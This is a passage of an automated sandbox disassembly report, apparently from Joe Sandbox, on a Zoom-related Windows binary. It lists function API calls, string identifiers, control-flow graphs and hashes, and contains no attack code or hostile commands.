                  • Part of subcall function 00C5DE1B: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C), ref: 00C5DEB6
                • EnterCriticalSection.KERNEL32(?,?,-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo), ref: 00C88C93
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo), ref: 00C88CB0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$Archive@$??0?$StringTree$CriticalH_prolog3_Node@PackageSectionTree@$AppendChild@ClearData@EnterH_prolog3LeaveNode@23@Root@State@Unlock@V123@@Varivant@
                • String ID: B64PBUserProfile$B64PZRUserProfile$ClientCred$ClientCredExpireTime$ClientNwsCred$HasZoomIM$UpdateType$com.zoom.app.notifyPTLoginInfo$meetingToken$nwsDomain$profileCardUrl$pzrCred$whiteboardUrlRegular$workflowUrlRegualr$workvivoDomain$zoomDocsUrlRegular
                • API String ID: 2816594900-2215852526
                • Opcode ID: 598a77a74bdde14ad77c50009c2ecb667cd5b54b62f7edacfbfa5f98b4b939ca
                • Instruction ID: 76022606d463eb5601610fa95c210e673f3932bf2625b0399e70ab6ae6a233e6
                • Opcode Fuzzy Hash: 598a77a74bdde14ad77c50009c2ecb667cd5b54b62f7edacfbfa5f98b4b939ca
                • Instruction Fuzzy Hash: E351CF34B01B009BCF24FBA099462AE76659F81709F444028EC13AB789DF70CE4AD7BD
                Function 00CB41B4 Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 91COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084), ref: 00CB41CD
                • ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084), ref: 00CB41DF
                  • Part of subcall function 00CA9B90: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000038,?,00000001,00CA99FB,00000000,?,00C5DF53,00000000,?,-00000004,?,00000040,00C5D7F6), ref: 00CA9BC2
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?), ref: 00CB41F3
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(Int32,String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name), ref: 00CB4212
                • ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,Int32,String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8), ref: 00CB421E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Compare@?$String$ArchiveVarivant@$ClearData@Int32@State@Unlock@
                • String ID: BOOL$Char$Double$Float$Int32$String$Text$UInt32
                • API String ID: 3594211462-4079823965
                • Opcode ID: 318f9f5bccfb6d3280ba99b46cf486a28ec61d0612a94f7b9d49d45a3687b960
                • Instruction ID: d3b7a25abf1cbe20d58f69d6cb3ea6026493e225e86d9c5a50229f920e15614a
                • Opcode Fuzzy Hash: 318f9f5bccfb6d3280ba99b46cf486a28ec61d0612a94f7b9d49d45a3687b960
                • Instruction Fuzzy Hash: AC21F8203087125BDB1C2B665CB62BE728B6FD1705F90001DFA0687187FF74AD95B667
                Function 00CA8BA0 Relevance: 40.8, APIs: 27, Instructions: 296COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2886 ca8ba0-ca8bca call ce5398 2889 ca8bd0-ca8bf5 ?Unlock@CState@Cmm@@QAEXXZ call c6537e 2886->2889 2890 ca8ff6-ca8ffb call ce5347 2886->2890 2896 ca8bf9-ca8c21 ??0?$CStringT@D@Cmm@@QAE@PBD@Z call c58567 2889->2896 2897 ca8bf7 2889->2897 2900 ca8fe3 2896->2900 2901 ca8c27 2896->2901 2897->2896 2902 ca8fe5-ca8ff4 call c58567 2900->2902 2901->2900 2903 ca8c2e-ca8c4e ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z 2901->2903 2904 ca8c7c-ca8cb6 ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z 2901->2904 2905 ca8f8d-ca8fb1 ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z 2901->2905 2906 ca8f42-ca8f62 ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z 2901->2906 2907 ca8e23-ca8e43 ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z 2901->2907 2908 ca8ec3-ca8efd ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z 2901->2908 2909 ca8e71-ca8e91 ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z 2901->2909 2910 ca8cf1-ca8d36 ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z 2901->2910 2902->2890 2914 ca8fdd-ca8fe1 2903->2914 2915 ca8c54-ca8c64 ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z 2903->2915 2913 ca8cd5-ca8cda 2904->2913 2916 ca8cb8-ca8cd3 call cf1066 ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z 2904->2916 2905->2914 2919 ca8fb3-ca8fc3 ?QueryDoubleValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAN@Z 2905->2919 2906->2914 2917 ca8f64-ca8f74 ?QueryFloatValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAM@Z 2906->2917 2907->2914 2918 ca8e49-ca8e59 ?QueryUnsignedValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAI@Z 2907->2918 2912 ca8f03-ca8f22 call c5dc01 2908->2912 2908->2913 2909->2914 2922 ca8e97-ca8ea7 ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z 2909->2922 2920 ca8d38-ca8d73 ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$CStringT@D@2@@Z 2910->2920 2921 ca8db2 2910->2921 2941 ca8f26-ca8f3d ?SetString@CCmmArchiveVarivant@Cmm@@QAEXPB_W@Z call c57be9 2912->2941 2942 ca8f24 2912->2942 2929 ca8cdd-ca8cec call c58567 2913->2929 2914->2900 2914->2902 2915->2914 2927 ca8c6a-ca8c77 ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z 2915->2927 2916->2929 2917->2914 2930 ca8f76-ca8f8b ?SetFloat@CCmmArchiveVarivant@Cmm@@QAEXM@Z 2917->2930 2918->2914 2931 ca8e5f-ca8e6c ?SetUInt32@CCmmArchiveVarivant@Cmm@@QAEXI@Z 2918->2931 2919->2914 2932 ca8fc5-ca8fdb ?SetDouble@CCmmArchiveVarivant@Cmm@@QAEXN@Z 2919->2932 2933 ca8d77-ca8db0 ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z ?StringToUInt64@Cmm@@YAHABV?$CStringT@_W@1@AA_K@Z 2920->2933 2934 ca8d75 2920->2934 2924 ca8db9-ca8dc1 2921->2924 2922->2914 2923 ca8ead-ca8ebe ?SetBool@CCmmArchiveVarivant@Cmm@@QAEXH@Z 2922->2923 2923->2902 2935 ca8dc3-ca8ddb call c57be9 2924->2935 2936 ca8de1-ca8dea 2924->2936 2927->2902 2929->2902 2930->2902 2931->2902 2932->2902 2933->2921 2933->2924 2934->2933 2935->2936 2943 ca8dfe-ca8e05 2936->2943 2944 ca8dec-ca8df9 call c57be9 2936->2944 2941->2929 2942->2941 2943->2913 2949 ca8e0b-ca8e1e ?SetUInt64@CCmmArchiveVarivant@Cmm@@QAEX_K@Z 2943->2949 2944->2943 2949->2929
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8BAA
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000090,00CA8B91,?,?,00CA58CD,?,?), ref: 00CA8BD7
                  • Part of subcall function 00C6537E: __EH_prolog3.LIBCMT ref: 00C65385
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004,00000000,?,00CA58CD,?,?), ref: 00CA8BFD
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C47
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C5D
                  • Part of subcall function 00CB0FC0: ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(?,00CA8C62,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CB0FC6
                  • Part of subcall function 00CB0FC0: ?ToInt@XMLUtil@tinyxml2@@SA_NPBDPAH@Z.RWSNDPQSKZ(00000000,?,?,00CA8C62,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CB0FCF
                • ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C72
                  • Part of subcall function 00CA99D0: ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(?,?,00CA8C77,00000000,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA99D6
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$ArchiveVarivant@$??0?$Attribute@Attribute@2@Attribute@tinyxml2@@ClearData@Element@tinyxml2@@Error@2@FindH_prolog3H_prolog3_Int32@Int@Pair@tinyxml2@@QueryState@Str@StringUnlock@Util@tinyxml2@@Value@
                • String ID:
                • API String ID: 4248426584-0
                • Opcode ID: 3c3454ecc864d6a21adcad5c175f525bbbd38b85474cb45b7ef8e268c760024c
                • Instruction ID: a0e284109e0108137f6b29c4566fbd3fa8d03c49ea527dd245493b744936724f
                • Opcode Fuzzy Hash: 3c3454ecc864d6a21adcad5c175f525bbbd38b85474cb45b7ef8e268c760024c
                • Instruction Fuzzy Hash: 92C15B71E0121ADFDF14DBA9C855BEEBBF5AF19308F504099E509A3241EB309A88DF61
                Function 00CDA0C0 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 178fileCOMMON
                Download Yara Rule
                APIs
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00CDA0F1
                • GetPrivateProfileStringW.KERNEL32(ZoomChat,com.zoom.test.disable_crash_handler,00000000,?,00000008,?), ref: 00CDA15E
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00CDA194
                • PathAppendW.SHLWAPI(?,Zoom), ref: 00CDA1AB
                • PathAppendW.SHLWAPI(?,logs), ref: 00CDA1BE
                • GetCurrentProcessId.KERNEL32 ref: 00CDA1C9
                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00CDA1DC
                • GetLastError.KERNEL32 ref: 00CDA1EA
                • ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 00CDA215
                • GetLastError.KERNEL32 ref: 00CDA221
                • CloseHandle.KERNEL32(?), ref: 00CDA22B
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDA23F
                • GetTempFileNameW.KERNEL32(?,zoomtest,00000000,?), ref: 00CDA273
                • DeleteFileW.KERNEL32(?), ref: 00CDA285
                • RevertToSelf.ADVAPI32 ref: 00CDA290
                • CloseHandle.KERNEL32(00000000), ref: 00CDA29B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Path$AppendCloseErrorFileFolderHandleLastProcessSpecial$CreateCurrentDeleteDirectoryImpersonateLoggedNameOpenPrivateProfileRevertSelfStringTempUser
                • String ID: Zoom$ZoomChat$\Zoom\data\Zoom.us.ini$com.zoom.test.disable_crash_handler$logs$yes$zoomtest
                • API String ID: 3017824836-3271044474
                • Opcode ID: ed16077e297b3354e9379e77b1f9286c7dc501161fb859362ed9e746a57f3898
                • Instruction ID: 0ce0b2e18f9d074e32cf54219aabcf523bfd5dff04d786cb7b70dd150620d94c
                • Opcode Fuzzy Hash: ed16077e297b3354e9379e77b1f9286c7dc501161fb859362ed9e746a57f3898
                • Instruction Fuzzy Hash: C6618F71644345ABE720DB60DC49B9FB7E9AF84701F00891EF698D7290EB70D549CBA3
                Function 00CB42D6 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 148COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB42E0
                • ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB42FF
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4335
                  • Part of subcall function 00CA4870: ?Attribute@XMLElement@tinyxml2@@QBEPBDPBD0@Z.RWSNDPQSKZ(?,00000000,?), ref: 00CA488A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4346
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4374
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(String,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB43C1
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB43D7
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8), ref: 00CB43E9
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8), ref: 00CB43F5
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004), ref: 00CB4407
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?), ref: 00CB4417
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8), ref: 00CB4423
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004), ref: 00CB4435
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Attribute@Element@tinyxml2@@$Error@2@Query$Cmm@@String$Attribute@2@Attribute@tinyxml2@@FindValue@$??0?$D@2@@std@@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$ArchiveArchive@H_prolog3_Node@State@TreeUnlock@
                • String ID: Node$String$count$dataType$isContainer$isEssential$name
                • API String ID: 2387648311-1746253375
                • Opcode ID: bff3e51f7da313bec1b3f2aacebe36d4d97f5260106b97d4c3cfc22cc4c24d3f
                • Instruction ID: 7e453db374a247094e38cf0a45ecad3a2a8ec9b07fb7d3f5e717878817ad5891
                • Opcode Fuzzy Hash: bff3e51f7da313bec1b3f2aacebe36d4d97f5260106b97d4c3cfc22cc4c24d3f
                • Instruction Fuzzy Hash: 6E51AF70A043199FCF18EFB48991AEEB7B5AF44304F544069E805A7282DF749A48EF65
                Function 00CB6981 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 224COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB698B
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00D2E78F,000000EC,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69C1
                • ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(?,?,?,000000EC,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69D4
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(00000000,{"m":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69E7
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000028,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69FA
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(00CB6E5E,","f":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A11
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000044,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A27
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(?,","t":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A3E
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A54
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(?,00D333D8,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A68
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00D2E78F,-00000004), ref: 00CB6B10
                • ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(?,00000000,00D334D8,-00000004), ref: 00CB6B22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$V01@$V01@@$??0?$D@1@@Int64String@$H_prolog3_
                • String ID: ","f":"$","t":"$,"c":${"m":"
                • API String ID: 2159182875-629339289
                • Opcode ID: acef86458e48934fcfaae5340f26cca6eec15031b8c20f2bdaf0cec79273be5f
                • Instruction ID: f143a59e9edc4bff72c325d11e3ad23bb675fc856b4ef741961df4541955847a
                • Opcode Fuzzy Hash: acef86458e48934fcfaae5340f26cca6eec15031b8c20f2bdaf0cec79273be5f
                • Instruction Fuzzy Hash: 94916CB8900308AFDF14EBA4D955AEDF7B4AF14305F404158E856B7292EB34AA8CDF64
                Function 00C5A0CC Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 138COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5A0D3
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C5A0DD
                • int.LIBCPMT ref: 00C5A0F4
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C5A12E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C53009,?,?,?,00000028,00C64738), ref: 00C5A13B
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C5A14E
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5A15B
                • __EH_prolog3_GS.LIBCMT ref: 00C5A168
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4,&gt;,00D333B8,&lt;,00D3339C), ref: 00C5A1A6
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4,&gt;,00D333B8,&lt;), ref: 00C5A1B9
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4), ref: 00C5A1E4
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4), ref: 00C5A1F7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C), ref: 00C5A222
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329), ref: 00C5A235
